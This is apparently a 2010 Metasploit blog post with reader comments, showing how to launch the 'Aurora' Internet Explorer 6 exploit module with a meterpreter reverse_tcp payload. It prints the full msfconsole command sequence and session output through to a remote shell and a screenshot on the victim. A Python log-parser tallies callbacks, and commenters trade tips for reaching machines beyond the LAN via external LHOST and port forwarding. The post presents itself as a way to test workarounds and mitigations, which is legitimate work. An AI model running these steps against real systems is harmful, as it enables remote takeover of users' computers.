Friday, January 15, 2010

Reproducing the "Aurora" IE Exploit

Update: This module, just like the original exploit, only works on IE6 at this time. IE7 requires a slightly different method to reuse the object pointer and IE8 enables DEP by default.

Yesterday, a copy of the unpatched Internet Explorer exploit used in the Aurora attacks was uploaded to Wepawet. Since the code is now public, we ported this to a Metasploit module in order to provide a safe way to test your workarounds and mitigation efforts.

To get started, grab the latest copy of the Metasploit Framework and use the online update feature to sync the latest exploits from the development tree. Start the Metasploit Console (msfconsole) and enter the following commands (the lines beginning with the msf prompt):

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.

msf exploit(ie_aurora) >

Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP\Developer

meterpreter > use espia
Loading extension espia...success.

meterpreter > screenshot aurora.bmp


meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Developer\Desktop>
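Since the point of the module is to test workarounds, here is an added example (not code from the post or from Metasploit) that parses msfconsole output in the format shown above: it tallies which test clients were served the page, which called back with a session, which were served but stayed silent, and flags the configuration problem that recurs in the comments, a reverse payload pointed at an RFC1918 LHOST that an off-LAN client cannot reach. The sample log is constructed; the function names and regexes are mine.

```python
import ipaddress
import re

# Line formats taken from the msfconsole output shown in the post.
SEND_RE = re.compile(r'\[\*\]\s*Sending .* to client (\S+)')
SESSION_RE = re.compile(
    r'\[\*\]\s*Meterpreter session (\d+) opened \(\S+ -> (\S+):\d+\)')
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def is_rfc1918(ip):
    return any(ip in net for net in RFC1918)

def analyze_msf_log(log_text, lhost):
    """Tally one run: clients served the page, clients that called back,
    clients served but silent (patched, DEP, or the first-try heap-fill
    miss from the comments), and clients that cannot reach a private LHOST."""
    lhost_private = is_rfc1918(ipaddress.ip_address(lhost))
    served, sessions, warnings = [], {}, []
    for line in log_text.splitlines():
        m = SEND_RE.search(line)
        if m:
            client = m.group(1)
            served.append(client)
            try:
                client_ip = ipaddress.ip_address(client)
            except ValueError:  # e.g. a redacted 121.xx.xx.xx
                warnings.append(f"{client}: address not parseable")
                continue
            # The reverse payload connects back to LHOST; an RFC1918
            # LHOST is unreachable from outside the LAN (hdm's point).
            if lhost_private and not is_rfc1918(client_ip):
                warnings.append(f"{client}: private LHOST {lhost} unreachable")
        m = SESSION_RE.search(line)
        if m:
            sessions[m.group(2)] = int(m.group(1))
    no_session = [c for c in served if c not in sessions]
    return {"served": served, "sessions": sessions,
            "no_session": no_session, "warnings": warnings}

# Constructed sample in the post's output format (not a real run).
SAMPLE_LOG = """\
[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client 192.168.0.166
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client 192.168.0.170
[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client 203.0.113.9
"""

if __name__ == "__main__":
    print(analyze_msf_log(SAMPLE_LOG, "192.168.0.151"))
```

Pipe a saved msfconsole transcript into analyze_msf_log with the LHOST you configured; a client listed under no_session with no warning is one where your mitigation (patch, DEP) held or the heap fill missed.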

21 comments:

Anonymous said...

Failed on IE 6 on Windows 2003 SP1.
Failed on IE 8 on Windows 7 RC1.

Medt said...

Fast update. Thanks for the penetration tools.

Anonymous said...

Thanks. I tried it with XP SP3 and IE7. It seems not to work properly; the browser crashes though.

Anonymous said...

Seems not to work with IE7.

dandart said...

Doesn't seem to work with IE8/XPSP3 - it just crashes the tab.

Par said...

IE6 running on XP SP3 with the following patches missing is invulnerable to your exploit:


Anonymous said...

Does not reproduce on XP SP2 or SP3.
Tested with both IE6 and IE7.

hdm said...

No crash, or no shell?

Crewl-T6 said...

Crashes on:

XP SP3 IE7
XP SP3 IE8

Anonymous said...

XP SP3 with IE7 reproduced nothing: no shell and no crash.

marco000 said...

I was able to get a shell on IE 6/SP2. On IE7 and IE8 with SP2 I was only able to get a crash, even with system wide DEP disabled. SP3 and IE8 also only resulted in crashes, no shell.

Anonymous said...

XP SP3 IE7 and Win7 IE8 only crash. No shell.

hdm said...

LHOST would need to be your external IP, not your internal one.

Anonymous said...

Works only locally with an internal IP. If I enter my external IP I get: getaddrinfo: Non-recoverable failure in name resolution.
Host is FreeBSD 8.

Mapache said...

Works fine with:

Windows XP SP2 (English) and IE6

I had to do it twice. The first time the Browser crashed without creating a session.
The second time it worked as expected.

hdm said...

That is pretty common for heap fill - the first time the heap was already in a state where the target address could not be reached.

John said...

Working on XP(32) SP3 IE6 on second attempt.
Crashed XP(32) IE7.
Crashed Win7(64) IE8.

Thanks for the good work HDM.

John

Anonymous said...

VUPEN released an exploit for IE 8 which bypasses DEP.

http://www.vupen.com/exploits

However, it is not public.

Anonymous said...

LHOST - 192.168.1.29
LPORT - 4444
SRVHOST - 192.168.1.29
SRVPORT - 8080
URIPATH - pags

These are the options I set for my Aurora exploit, and I used windows/meterpreter/reverse_tcp as the payload. I have port-forwarded 8080 and 4444 on my router, and when I hit exploit, the output is shown below:

msf exploit (ie_aurora) > exploit
[*]Exploit running as background job.
msf exploit (ie_aurora) > [*] Started reverse handler on port 4444
[*]Using URL: http://192.168.1.29:8080/pags
[*]Server started.
[*]Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client 121.xx.xx.xx

I asked my friend to access http://myexternalip:8080/pags and he was able to connect, but when my PC replies by sending the Aurora exploit to him, it stops there. I tried waiting for a couple of minutes, but nothing happens. Can anyone share his thoughts on what may be the problem? I already tried this on my LAN and it sure works.

hdm said...

LHOST would need to be your external IP and LPORT would need to be forwarded.

Anonymous said...

Works on baseline XP SP2. Are these guys nuts posting comments about IE7? Did they not read the first paragraph? Thanks for your post, great work.

SH4DYC4T